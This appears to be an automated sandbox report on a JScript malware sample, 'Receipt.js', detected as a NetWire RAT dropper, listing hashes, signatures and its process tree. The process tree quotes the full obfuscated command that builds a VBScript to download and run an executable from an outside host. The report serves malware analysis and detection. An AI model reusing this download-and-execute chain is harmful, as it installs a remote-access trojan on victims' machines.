Analysis
-
max time kernel
18s -
max time network
132s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-03-2021 20:44
Static task
static1
Behavioral task
behavioral1
Sample
IMAGE2102100021110001.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
IMAGE2102100021110001.js
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Receipt.js
Resource
win7v20201028
General
-
Target
Receipt.js
-
Size
7KB
-
MD5
8a3dfd884399d98c9e5b25fc5cc14628
-
SHA1
376db27f44dcb2e76d70407f9bb1bb0c3a9d8185
-
SHA256
717c8e21ae8aac9685a43722d18bcb6746875654fdefba88250c5c2fe6ce4ace
-
SHA512
07633ce6257057461b47e962fba7dbffc6e96cf1f74354567baabe1fb6ef744d8b7f49c7e083dd0a291666ffbf8d7aa29d6676c14522ef110c82e3248f11fa57
Malware Config
Signatures
-
NetWire RAT payload 1 IoCs
Processes:
resource yara_rule behavioral4/memory/1404-12-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 9 3436 WScript.exe -
Executes dropped EXE 2 IoCs
Processes:
IZU.EXEIZU.EXEpid process 2540 IZU.EXE 1404 IZU.EXE -
Loads dropped DLL 1 IoCs
Processes:
IZU.EXEpid process 2540 IZU.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
IZU.EXEdescription pid process target process PID 2540 set thread context of 1404 2540 IZU.EXE IZU.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\IZU.EXE nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\IZU.EXE nsis_installer_2 C:\Users\Admin\AppData\Local\Temp\IZU.EXE nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\IZU.EXE nsis_installer_2 C:\Users\Admin\AppData\Local\Temp\IZU.EXE nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\IZU.EXE nsis_installer_2 -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3348 timeout.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
IZU.EXEpid process 2540 IZU.EXE 2540 IZU.EXE 2540 IZU.EXE 2540 IZU.EXE 2540 IZU.EXE 2540 IZU.EXE 2540 IZU.EXE 2540 IZU.EXE -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
IZU.EXEpid process 2540 IZU.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
wscript.execmd.exeIZU.EXEdescription pid process target process PID 3248 wrote to memory of 3152 3248 wscript.exe cmd.exe PID 3248 wrote to memory of 3152 3248 wscript.exe cmd.exe PID 3152 wrote to memory of 3436 3152 cmd.exe WScript.exe PID 3152 wrote to memory of 3436 3152 cmd.exe WScript.exe PID 3152 wrote to memory of 3348 3152 cmd.exe timeout.exe PID 3152 wrote to memory of 3348 3152 cmd.exe timeout.exe PID 3152 wrote to memory of 2540 3152 cmd.exe IZU.EXE PID 3152 wrote to memory of 2540 3152 cmd.exe IZU.EXE PID 3152 wrote to memory of 2540 3152 cmd.exe IZU.EXE PID 2540 wrote to memory of 1404 2540 IZU.EXE IZU.EXE PID 2540 wrote to memory of 1404 2540 IZU.EXE IZU.EXE PID 2540 wrote to memory of 1404 2540 IZU.EXE IZU.EXE PID 2540 wrote to memory of 1404 2540 IZU.EXE IZU.EXE
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Receipt.js1⤵
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C Cd %TemP% & @EChO Q1o = "http://panslimiterd.com/image.exe">>A9i.vBe &@EChO T6x = E0r("hytMdwd")>>A9i.vBe &@EChO Set L5y = CreateObject(E0r("lrwlkQMwlkgsso"))>>A9i.vBe &@EChO L5y.Open E0r("fds"), Q1o, False>>A9i.vBe &@EChO L5y.send ("")>>A9i.vBe &@EChO Set G1l = CreateObject(E0r("`cncaMrsqd`l"))>>A9i.vBe &@EChO G1l.Open>>A9i.vBe &@EChO G1l.Type = 1 >>A9i.vBe &@EChO G1l.Write L5y.ResponseBody>>A9i.vBe & @EChO G1l.Position = 0 >>A9i.vBe &@EChO G1l.SaveToFile T6x, 2 >>A9i.vBe &@EChO G1l.Close>>A9i.vBe &@EChO function E0r(M6e) >> A9i.vBe &@EChO For H5h = 1 To Len(M6e) >>A9i.vBe &@EChO E9c = Mid(M6e, H5h, 1) >>A9i.vBe &@EChO E9c = Chr(Asc(E9c)- 31) >>A9i.vBe &@EChO I3d = I3d + E9c >> A9i.vBe &@EChO Next >>A9i.vBe &@EChO E0r = I3d >>A9i.vBe &@EChO End Function >>A9i.vBe& A9i.vBe &DEL A9i.vBe & timeout 12 & IZU.EXE2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A9i.vBe"3⤵
- Blocklisted process makes network request
PID:3436
-
-
C:\Windows\system32\timeout.exetimeout 123⤵
- Delays execution with timeout.exe
PID:3348
-
-
C:\Users\Admin\AppData\Local\Temp\IZU.EXEIZU.EXE3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\IZU.EXEIZU.EXE4⤵
- Executes dropped EXE
PID:1404
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d7e4ca7edbd5319f72f69a326582d7ab
SHA16f5b22b689ce2cda972a991b1d8dfaf01bb7b1d2
SHA256951d293be13f6a9a61d31df0adf73af083337b7fb4e11cf19581889d16087850
SHA5126f6403e436ee4ab29fa4366e284745bb8776ae5e851197ce6f601d19a9c5e77e12fe69522d18bbae4cf8dba2a25e5a3b593ebd8242b3dde1d4c357482da9d8b7
-
MD5
059d96b63981600043166193b25f479e
SHA17bc871be5b1905692eb1a6d93158668092cdb51c
SHA256f77b3b293e8f2218082419742b85c2156fe8c13353cec54ba021e26312d3698f
SHA5129c10be0296905681b1c52f126ee86a78fe6004f1ffc895e08b403d0726f464546fd308ee57383be23f06fd09e1f099bca3e8b7916715642bdebc2019abb1d2ed
-
MD5
059d96b63981600043166193b25f479e
SHA17bc871be5b1905692eb1a6d93158668092cdb51c
SHA256f77b3b293e8f2218082419742b85c2156fe8c13353cec54ba021e26312d3698f
SHA5129c10be0296905681b1c52f126ee86a78fe6004f1ffc895e08b403d0726f464546fd308ee57383be23f06fd09e1f099bca3e8b7916715642bdebc2019abb1d2ed
-
MD5
059d96b63981600043166193b25f479e
SHA17bc871be5b1905692eb1a6d93158668092cdb51c
SHA256f77b3b293e8f2218082419742b85c2156fe8c13353cec54ba021e26312d3698f
SHA5129c10be0296905681b1c52f126ee86a78fe6004f1ffc895e08b403d0726f464546fd308ee57383be23f06fd09e1f099bca3e8b7916715642bdebc2019abb1d2ed
-
MD5
dc75a8b470f13c8ee2509f84e5e05eb9
SHA127fe57d610f4c9ff84377911cff2c7db0aa7e0ee
SHA256e416459e6f3011911ecbb3b3eba891b0f82668bef98ea6cbe05ef56dc645027d
SHA51222fbfc9614c5bfbc1e6c5370144d26a540f726edb9b7d7c615f91f179f88f8eb1dff72daff51d594274a326f88404e150a91b3c95aa0b192d6d4a4d28bd11629